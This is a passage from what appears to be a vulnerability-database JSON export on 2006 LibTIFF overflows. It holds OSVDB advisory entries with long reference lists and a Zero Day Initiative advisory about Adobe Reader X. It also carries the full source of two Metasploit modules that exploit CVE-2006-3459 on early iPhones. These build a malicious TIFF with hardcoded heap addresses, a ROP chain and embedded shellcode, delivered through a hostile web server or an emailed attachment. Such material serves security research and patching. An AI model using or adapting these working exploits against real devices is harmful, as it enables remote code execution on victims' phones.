ID:21537](https://secuniaresearch.flexerasoftware.com/advisories/21537/)\n[Related OSVDB ID: 27725](https://vulners.com/osvdb/OSVDB:27725)\n[Related OSVDB ID: 27729](https://vulners.com/osvdb/OSVDB:27729)\n[Related OSVDB ID: 27724](https://vulners.com/osvdb/OSVDB:27724)\n[Related OSVDB ID: 27728](https://vulners.com/osvdb/OSVDB:27728)\n[Related OSVDB ID: 27723](https://vulners.com/osvdb/OSVDB:27723)\n[Related OSVDB ID: 27727](https://vulners.com/osvdb/OSVDB:27727)\nRedHat RHSA: RHSA-2006:0648\nRedHat RHSA: RHSA-2006:0603\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Aug/0001.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2006:137\nOther Advisory URL: http://www.ubuntu.com/usn/usn-330-1\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1137\nOther Advisory URL: https://issues.rpath.com/browse/RPL-558\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.536600\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-103099-1\n[CVE-2006-3462](https://vulners.com/cve/CVE-2006-3462)\n", "modified": "2006-08-02T08:49:09", "published": "2006-08-02T08:49:09", "href": "https://vulners.com/osvdb/OSVDB:27726", "id": "OSVDB:27726", "title": "LibTIFF NeXT RLE Decoder Image Handling Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "description": "## Vulnerability Description\nA local overflow exists in LibTIFF. The PixarLog decoder fails to validate TIFF image files resulting in a heap overflow. With a specially crafted file, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 3.8.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA local overflow exists in LibTIFF. The PixarLog decoder fails to validate TIFF image files resulting in a heap overflow. With a specially crafted file, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://www.libtiff.org/\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200608-07.xml)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=304063)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20060801-01-P.asc)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20060901-01-P.asc)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-166.htm)\n[Secunia Advisory ID:21290](https://secuniaresearch.flexerasoftware.com/advisories/21290/)\n[Secunia Advisory ID:21334](https://secuniaresearch.flexerasoftware.com/advisories/21334/)\n[Secunia Advisory ID:21598](https://secuniaresearch.flexerasoftware.com/advisories/21598/)\n[Secunia Advisory ID:21632](https://secuniaresearch.flexerasoftware.com/advisories/21632/)\n[Secunia Advisory ID:27181](https://secuniaresearch.flexerasoftware.com/advisories/27181/)\n[Secunia Advisory ID:21319](https://secuniaresearch.flexerasoftware.com/advisories/21319/)\n[Secunia Advisory ID:21338](https://secuniaresearch.flexerasoftware.com/advisories/21338/)\n[Secunia Advisory ID:21392](https://secuniaresearch.flexerasoftware.com/advisories/21392/)\n[Secunia Advisory ID:21253](https://secuniaresearch.flexerasoftware.com/advisories/21253/)\n[Secunia Advisory ID:21501](https://secuniaresearch.flexerasoftware.com/advisories/21501/)\n[Secunia Advisory ID:22036](https://secuniaresearch.flexerasoftware.com/advisories/22036/)\n[Secunia Advisory ID:27222](https://secuniaresearch.flexerasoftware.com/advisories/27222/)\n[Secunia Advisory ID:21274](https://secuniaresearch.flexerasoftware.com/advisories/21274/)\n[Secunia Advisory ID:21304](https://secuniaresearch.flexerasoftware.com/advisories/21304/)\n[Secunia Advisory ID:21370](https://secuniaresearch.flexerasoftware.com/advisories/21370/)\n[Secunia Advisory ID:21537](https://secuniaresearch.flexerasoftware.com/advisories/21537/)\n[Related OSVDB ID: 27729](https://vulners.com/osvdb/OSVDB:27729)\n[Related OSVDB ID: 27724](https://vulners.com/osvdb/OSVDB:27724)\n[Related OSVDB ID: 27728](https://vulners.com/osvdb/OSVDB:27728)\n[Related OSVDB ID: 27723](https://vulners.com/osvdb/OSVDB:27723)\n[Related OSVDB ID: 27727](https://vulners.com/osvdb/OSVDB:27727)\n[Related OSVDB ID: 27726](https://vulners.com/osvdb/OSVDB:27726)\nRedHat RHSA: RHSA-2006:0648\nRedHat RHSA: RHSA-2006:0603\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Aug/0001.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2006:137\nOther Advisory URL: http://www.ubuntu.com/usn/usn-330-1\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1137\nOther Advisory URL: https://issues.rpath.com/browse/RPL-558\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.536600\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-103099-1\n[CVE-2006-3461](https://vulners.com/cve/CVE-2006-3461)\nBugtraq ID: 19290\n", "modified": "2006-08-02T08:49:09", "published": "2006-08-02T08:49:09", "href": "https://vulners.com/osvdb/OSVDB:27725", "id": "OSVDB:27725", "title": "LibTIFF PixarLog Decoder Unspecified Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200608-07.xml)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20060801-01-P.asc)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20060901-01-P.asc)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-166.htm)\n[Secunia Advisory ID:21290](https://secuniaresearch.flexerasoftware.com/advisories/21290/)\n[Secunia Advisory ID:21334](https://secuniaresearch.flexerasoftware.com/advisories/21334/)\n[Secunia Advisory ID:21598](https://secuniaresearch.flexerasoftware.com/advisories/21598/)\n[Secunia Advisory ID:21632](https://secuniaresearch.flexerasoftware.com/advisories/21632/)\n[Secunia Advisory ID:27181](https://secuniaresearch.flexerasoftware.com/advisories/27181/)\n[Secunia Advisory ID:21319](https://secuniaresearch.flexerasoftware.com/advisories/21319/)\n[Secunia Advisory ID:21338](https://secuniaresearch.flexerasoftware.com/advisories/21338/)\n[Secunia Advisory ID:21392](https://secuniaresearch.flexerasoftware.com/advisories/21392/)\n[Secunia Advisory ID:21501](https://secuniaresearch.flexerasoftware.com/advisories/21501/)\n[Secunia Advisory ID:22036](https://secuniaresearch.flexerasoftware.com/advisories/22036/)\n[Secunia Advisory ID:27222](https://secuniaresearch.flexerasoftware.com/advisories/27222/)\n[Secunia Advisory ID:21274](https://secuniaresearch.flexerasoftware.com/advisories/21274/)\n[Secunia Advisory ID:21304](https://secuniaresearch.flexerasoftware.com/advisories/21304/)\n[Secunia Advisory ID:21370](https://secuniaresearch.flexerasoftware.com/advisories/21370/)\n[Secunia Advisory ID:21537](https://secuniaresearch.flexerasoftware.com/advisories/21537/)\n[Related OSVDB ID: 27725](https://vulners.com/osvdb/OSVDB:27725)\n[Related OSVDB ID: 27729](https://vulners.com/osvdb/OSVDB:27729)\n[Related OSVDB ID: 27728](https://vulners.com/osvdb/OSVDB:27728)\n[Related OSVDB ID: 27723](https://vulners.com/osvdb/OSVDB:27723)\n[Related OSVDB ID: 27727](https://vulners.com/osvdb/OSVDB:27727)\n[Related OSVDB ID: 27726](https://vulners.com/osvdb/OSVDB:27726)\nRedHat RHSA: RHSA-2006:0648\nRedHat RHSA: RHSA-2006:0603\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Aug/0001.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2006:137\nOther Advisory URL: http://www.ubuntu.com/usn/usn-330-1\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1137\nOther Advisory URL: https://issues.rpath.com/browse/RPL-558\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.536600\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-103099-1\n[CVE-2006-3460](https://vulners.com/cve/CVE-2006-3460)\n", "modified": "2006-08-02T08:49:09", "published": "2006-08-02T08:49:09", "href": "https://vulners.com/osvdb/OSVDB:27724", "id": "OSVDB:27724", "title": "LibTIFF JPEG Decoder Encoded JPEG Stream Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200608-07.xml)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20060801-01-P.asc)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20060901-01-P.asc)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-166.htm)\n[Secunia Advisory ID:21290](https://secuniaresearch.flexerasoftware.com/advisories/21290/)\n[Secunia Advisory ID:21334](https://secuniaresearch.flexerasoftware.com/advisories/21334/)\n[Secunia Advisory ID:21598](https://secuniaresearch.flexerasoftware.com/advisories/21598/)\n[Secunia Advisory ID:21632](https://secuniaresearch.flexerasoftware.com/advisories/21632/)\n[Secunia Advisory ID:21319](https://secuniaresearch.flexerasoftware.com/advisories/21319/)\n[Secunia Advisory ID:21338](https://secuniaresearch.flexerasoftware.com/advisories/21338/)\n[Secunia Advisory ID:21392](https://secuniaresearch.flexerasoftware.com/advisories/21392/)\n[Secunia Advisory ID:21501](https://secuniaresearch.flexerasoftware.com/advisories/21501/)\n[Secunia Advisory ID:22036](https://secuniaresearch.flexerasoftware.com/advisories/22036/)\n[Secunia Advisory ID:21274](https://secuniaresearch.flexerasoftware.com/advisories/21274/)\n[Secunia Advisory ID:21304](https://secuniaresearch.flexerasoftware.com/advisories/21304/)\n[Secunia Advisory ID:21370](https://secuniaresearch.flexerasoftware.com/advisories/21370/)\n[Secunia Advisory ID:21537](https://secuniaresearch.flexerasoftware.com/advisories/21537/)\n[Related OSVDB ID: 27725](https://vulners.com/osvdb/OSVDB:27725)\n[Related OSVDB ID: 27729](https://vulners.com/osvdb/OSVDB:27729)\n[Related OSVDB ID: 27724](https://vulners.com/osvdb/OSVDB:27724)\n[Related OSVDB ID: 27723](https://vulners.com/osvdb/OSVDB:27723)\n[Related OSVDB ID: 27727](https://vulners.com/osvdb/OSVDB:27727)\n[Related OSVDB ID: 27726](https://vulners.com/osvdb/OSVDB:27726)\nRedHat RHSA: RHSA-2006:0648\nRedHat RHSA: RHSA-2006:0603\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Aug/0001.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2006:137\nOther Advisory URL: http://www.ubuntu.com/usn/usn-330-1\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1137\nOther Advisory URL: https://issues.rpath.com/browse/RPL-558\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.536600\n[CVE-2006-3464](https://vulners.com/cve/CVE-2006-3464)\nBugtraq ID: 19286\n", "modified": "2006-08-02T08:49:09", "published": "2006-08-02T08:49:09", "href": "https://vulners.com/osvdb/OSVDB:27728", "id": "OSVDB:27728", "title": "LibTIFF Directory Handling Large Offset Unspecified Issue", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "description": "## Vulnerability Description\nA local overflow exists in LibTIFF. The TIFFFetchShortPair function fails to validate TIFF image files resulting in a stack overflow. With a specially crafted file, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 3.8.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA local overflow exists in LibTIFF. The TIFFFetchShortPair function fails to validate TIFF image files resulting in a stack overflow. With a specially crafted file, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200608-07.xml)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=304063)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20060801-01-P.asc)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20060901-01-P.asc)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-166.htm)\n[Secunia Advisory ID:21290](https://secuniaresearch.flexerasoftware.com/advisories/21290/)\n[Secunia Advisory ID:21334](https://secuniaresearch.flexerasoftware.com/advisories/21334/)\n[Secunia Advisory ID:21598](https://secuniaresearch.flexerasoftware.com/advisories/21598/)\n[Secunia Advisory ID:21632](https://secuniaresearch.flexerasoftware.com/advisories/21632/)\n[Secunia Advisory ID:27181](https://secuniaresearch.flexerasoftware.com/advisories/27181/)\n[Secunia Advisory ID:21319](https://secuniaresearch.flexerasoftware.com/advisories/21319/)\n[Secunia Advisory ID:21338](https://secuniaresearch.flexerasoftware.com/advisories/21338/)\n[Secunia Advisory ID:21392](https://secuniaresearch.flexerasoftware.com/advisories/21392/)\n[Secunia Advisory ID:21253](https://secuniaresearch.flexerasoftware.com/advisories/21253/)\n[Secunia Advisory ID:21501](https://secuniaresearch.flexerasoftware.com/advisories/21501/)\n[Secunia Advisory ID:21672](https://secuniaresearch.flexerasoftware.com/advisories/21672/)\n[Secunia Advisory ID:22036](https://secuniaresearch.flexerasoftware.com/advisories/22036/)\n[Secunia Advisory ID:27222](https://secuniaresearch.flexerasoftware.com/advisories/27222/)\n[Secunia Advisory ID:21304](https://secuniaresearch.flexerasoftware.com/advisories/21304/)\n[Secunia Advisory ID:21274](https://secuniaresearch.flexerasoftware.com/advisories/21274/)\n[Secunia Advisory ID:21370](https://secuniaresearch.flexerasoftware.com/advisories/21370/)\n[Secunia Advisory ID:21537](https://secuniaresearch.flexerasoftware.com/advisories/21537/)\n[Related OSVDB ID: 27725](https://vulners.com/osvdb/OSVDB:27725)\n[Related OSVDB ID: 27729](https://vulners.com/osvdb/OSVDB:27729)\n[Related OSVDB ID: 27724](https://vulners.com/osvdb/OSVDB:27724)\n[Related OSVDB ID: 27728](https://vulners.com/osvdb/OSVDB:27728)\n[Related OSVDB ID: 27727](https://vulners.com/osvdb/OSVDB:27727)\n[Related OSVDB ID: 27726](https://vulners.com/osvdb/OSVDB:27726)\nRedHat RHSA: RHSA-2006:0648\nRedHat RHSA: RHSA-2006:0603\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Aug/0001.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2006:137\nOther Advisory URL: https://issues.rpath.com/browse/RPL-558\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1137\nOther Advisory URL: http://www.ubuntu.com/usn/usn-330-1\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.536600\nOther Advisory URL: http://noobz.eu/content/home.html#280806\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-103099-1\n[CVE-2006-3459](https://vulners.com/cve/CVE-2006-3459)\n", "modified": "2006-08-02T08:49:09", "published": "2006-08-02T08:49:09", "href": "https://vulners.com/osvdb/OSVDB:27723", "id": "OSVDB:27723", "title": "LibTIFF tif_dirread.c TIFFFetchShortPair Function Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2019-10-11T19:55:31", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow in the version of libtiff shipped with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone. iPhones which have not had the BSD tools installed will need to use a special payload.\n", "modified": "2017-07-24T13:26:21", "published": "2012-09-10T22:42:17", "id": "MSF:EXPLOIT/APPLE_IOS/BROWSER/SAFARI_LIBTIFF", "href": "", "type": "metasploit", "title": "Apple iOS MobileSafari LibTIFF Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n #\n # This module acts as an HTTP server\n #\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apple iOS MobileSafari LibTIFF Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in the version of\n libtiff shipped with firmware versions 1.00, 1.01, 1.02, and\n 1.1.1 of the Apple iPhone. iPhones which have not had the BSD\n tools installed will need to use a special payload.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['hdm', 'kf'],\n 'References' =>\n [\n ['CVE', '2006-3459'],\n ['OSVDB', '27723'],\n ['BID', '19283']\n ],\n 'Payload' =>\n {\n 'Space' => 1800,\n 'BadChars' => \"\",\n\n # Multi-threaded applications are not allowed to execve() on OS X\n # This stub injects a vfork/exit in front of the payload\n 'Prepend' =>\n [\n 0xe3a0c042, # vfork\n 0xef000080, # sc\n 0xe3500000, # cmp r0, #0\n 0x1a000001, # bne\n 0xe3a0c001, # exit(0)\n 0xef000080 # sc\n ].pack(\"V*\")\n },\n 'Arch' => ARCH_ARMLE,\n 'Platform' => %w{ osx },\n 'Targets' =>\n [\n\n [ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',\n {\n 'Platform' => 'osx',\n\n # Scratch space for our shellcode and stack\n 'Heap' => 0x00802000,\n\n # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib\n 'Magic' => 0x300d562c,\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Aug 01 2006'\n ))\n end\n\n def on_request_uri(cli, req)\n\n\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Grab reference to the target\n t = target\n\n print_status(\"Sending exploit\")\n\n # Transmit the compressed response to the client\n send_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' })\n\n # Handle the payload\n handler(cli)\n end\n\n def generate_tiff(code, targ)\n\n #\n # This is a TIFF file, we have a huge range of evasion\n # capabilities, but for now, we don't use them.\n # - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday\n #\n\n lolz = 2048\n tiff =\n \"\\x49\\x49\\x2a\\x00\\x1e\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x01\\x03\\x00\"+\n \"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x01\\x01\\x03\\x00\"+\n \"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x03\\x01\\x03\\x00\"+\n \"\\x01\\x00\\x00\\x00\\xaa\\x00\\x00\\x00\\x06\\x01\\x03\\x00\"+\n \"\\x01\\x00\\x00\\x00\\xbb\\x00\\x00\\x00\\x11\\x01\\x04\\x00\"+\n \"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x17\\x01\\x04\\x00\"+\n \"\\x01\\x00\\x00\\x00\\x15\\x00\\x00\\x00\\x1c\\x01\\x03\\x00\"+\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x50\\x01\\x03\\x00\"+\n [lolz].pack(\"V\") +\n \"\\x84\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n # Randomize the bajeezus out of our data\n hehe = rand_text(lolz)\n\n # Were going to candy mountain!\n hehe[120, 4] = [targ['Magic']].pack(\"V\")\n\n # >> add r0, r4, #0x30\n hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack(\"V\")\n\n # Candy mountain, Charlie!\n # >> mov r1, sp\n\n # It will be an adventure!\n # >> mov r2, r8\n hehe[ 92, 4] = [ hehe.length ].pack(\"V\")\n\n # Its a magic leoplurodon!\n # It has spoken!\n # It has shown us the way!\n # >> bl _memcpy\n\n # Its just over this bridge, Charlie!\n # This magical bridge!\n # >> ldr r3, [r4, #32]\n # >> ldrt r3, [pc], r3, lsr #30\n # >> str r3, [r4, #32]\n # >> ldr r3, [r4, #36]\n # >> ldrt r3, [pc], r3, lsr #30\n # >> str r3, [r4, #36]\n # >> ldr r3, [r4, #40]\n # >> ldrt r3, [pc], r3, lsr #30\n # >> str r3, [r4, #40]\n # >> ldr r3, [r4, #44]\n # >> ldrt r3, [pc], r3, lsr #30\n # >> str r3, [r4, #44]\n\n # We made it to candy mountain!\n # Go inside Charlie!\n # sub sp, r7, #0x14\n hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack(\"V\")\n\n # Goodbye Charlie!\n # ;; targ['Heap'] + 0x48 becomes the stack pointer\n # >> ldmia sp!, {r8, r10}\n\n # Hey, what the...!\n # >> ldmia sp!, {r4, r5, r6, r7, pc}\n\n # Return back to the copied heap data\n hehe[192, 4] = [ targ['Heap'] + 196 ].pack(\"V\")\n\n # Insert our actual shellcode at heap location + 196\n hehe[196, payload.encoded.length] = payload.encoded\n\n tiff << hehe\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/apple_ios/browser/safari_libtiff.rb"}, {"lastseen": "2019-10-14T08:13:03", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow in the version of libtiff shipped with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone. iPhones which have not had the BSD tools installed will need to use a special payload.\n", "modified": "2017-07-24T13:26:21", "published": "2012-09-10T22:42:17", "id": "MSF:EXPLOIT/APPLE_IOS/EMAIL/MOBILEMAIL_LIBTIFF", "href": "", "type": "metasploit", "title": "Apple iOS MobileMail LibTIFF Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n #\n # This module sends email messages via smtp\n #\n include Msf::Exploit::Remote::SMTPDeliver\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apple iOS MobileMail LibTIFF Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in the version of\n libtiff shipped with firmware versions 1.00, 1.01, 1.02, and\n 1.1.1 of the Apple iPhone. iPhones which have not had the BSD\n tools installed will need to use a special payload.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['hdm', 'kf'],\n 'References' =>\n [\n ['CVE', '2006-3459'],\n ['OSVDB', '27723'],\n ['BID', '19283']\n ],\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'Payload' =>\n {\n 'Space' => 1800,\n 'BadChars' => \"\",\n 'Compat' =>\n {\n 'ConnectionType' => '-bind -find',\n },\n },\n 'Arch' => ARCH_ARMLE,\n 'Platform' => %w{ osx },\n 'Targets' =>\n [\n\n [ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',\n {\n 'Platform' => 'osx',\n\n # Scratch space for our shellcode and stack\n 'Heap' => 0x00802000,\n\n # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib\n 'Magic' => 0x300d562c,\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Aug 01 2006'\n ))\n\n end\n\n def autofilter\n false\n end\n\n def exploit\n\n exts = ['jpg', 'tiff', 'tif']\n\n gext = exts[rand(exts.length)]\n name = rand_text_alpha(rand(10)+1) + \".#{gext}\"\n data = Rex::Text.rand_text_alpha(rand(32)+1)\n tiff = generate_tiff(target)\n\n msg = Rex::MIME::Message.new\n msg.mime_defaults\n msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)\n msg.to = datastore['MAILTO']\n msg.from = datastore['MAILFROM']\n\n msg.add_part(Rex::Text.encode_base64(data, \"\\r\\n\"), \"text/plain\", \"base64\", \"inline\")\n msg.add_part_attachment(tiff, rand_text_alpha(rand(32)+1) + \".\" + gext)\n\n send_message(msg.to_s)\n\n print_status(\"Waiting for a payload session (backgrounding)...\")\n end\n\n def generate_tiff(targ)\n #\n # This is a TIFF file, we have a huge range of evasion\n # capabilities, but for now, we don't use them.\n # - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday\n #\n\n lolz = 2048\n tiff =\n \"\\x49\\x49\\x2a\\x00\\x1e\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x01\\x03\\x00\"+\n \"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x01\\x01\\x03\\x00\"+\n \"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x03\\x01\\x03\\x00\"+\n \"\\x01\\x00\\x00\\x00\\xaa\\x00\\x00\\x00\\x06\\x01\\x03\\x00\"+\n \"\\x01\\x00\\x00\\x00\\xbb\\x00\\x00\\x00\\x11\\x01\\x04\\x00\"+\n \"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x17\\x01\\x04\\x00\"+\n \"\\x01\\x00\\x00\\x00\\x15\\x00\\x00\\x00\\x1c\\x01\\x03\\x00\"+\n \"\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x50\\x01\\x03\\x00\"+\n [lolz].pack(\"V\") +\n \"\\x84\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n # Randomize the bajeezus out of our data\n hehe = rand_text(lolz)\n\n # Were going to candy mountain!\n hehe[120, 4] = [targ['Magic']].pack(\"V\")\n\n # >> add r0, r4, #0x30\n hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack(\"V\")\n\n # Candy mountain, Charlie!\n # >> mov r1, sp\n\n # It will be an adventure!\n # >> mov r2, r8\n hehe[ 92, 4] = [ hehe.length ].pack(\"V\")\n\n # Its a magic leoplurodon!\n # It has spoken!\n # It has shown us the way!\n # >> bl _memcpy\n\n # Its just over this bridge, Charlie!\n # This magical bridge!\n # >> ldr r3, [r4, #32]\n # >> ldrt r3, [pc], r3, lsr #30\n # >> str r3, [r4, #32]\n # >> ldr r3, [r4, #36]\n # >> ldrt r3, [pc], r3, lsr #30\n # >> str r3, [r4, #36]\n # >> ldr r3, [r4, #40]\n # >> ldrt r3, [pc], r3, lsr #30\n # >> str r3, [r4, #40]\n # >> ldr r3, [r4, #44]\n # >> ldrt r3, [pc], r3, lsr #30\n # >> str r3, [r4, #44]\n\n # We made it to candy mountain!\n # Go inside Charlie!\n # sub sp, r7, #0x14\n hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack(\"V\")\n\n # Goodbye Charlie!\n # ;; targ['Heap'] + 0x48 becomes the stack pointer\n # >> ldmia sp!, {r8, r10}\n\n # Hey, what the...!\n # >> ldmia sp!, {r4, r5, r6, r7, pc}\n\n # Return back to the copied heap data\n hehe[192, 4] = [ targ['Heap'] + 196 ].pack(\"V\")\n\n # Insert our actual shellcode at heap location + 196\n hehe[196, payload.encoded.length] = payload.encoded\n\n tiff << hehe\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/apple_ios/email/mobilemail_libtiff.rb"}], "zdi": [{"lastseen": "2016-11-09T00:18:00", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Reader X. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within because Adobe Reader X includes an old version of libtiff. Adobe can be tricked in using this library by parsing a specially crafted PDF file containing U3D data. Due to the old version of libtiff Adobe Reader is vulnerable to the issue described in CVE-2006-3459 which can be leveraged to execute remote code under the context of the user running the application.", "modified": "2011-11-09T00:00:00", "published": "2011-10-26T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-302", "id": "ZDI-11-302", "title": "Adobe Reader U3D TIFF Resource Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
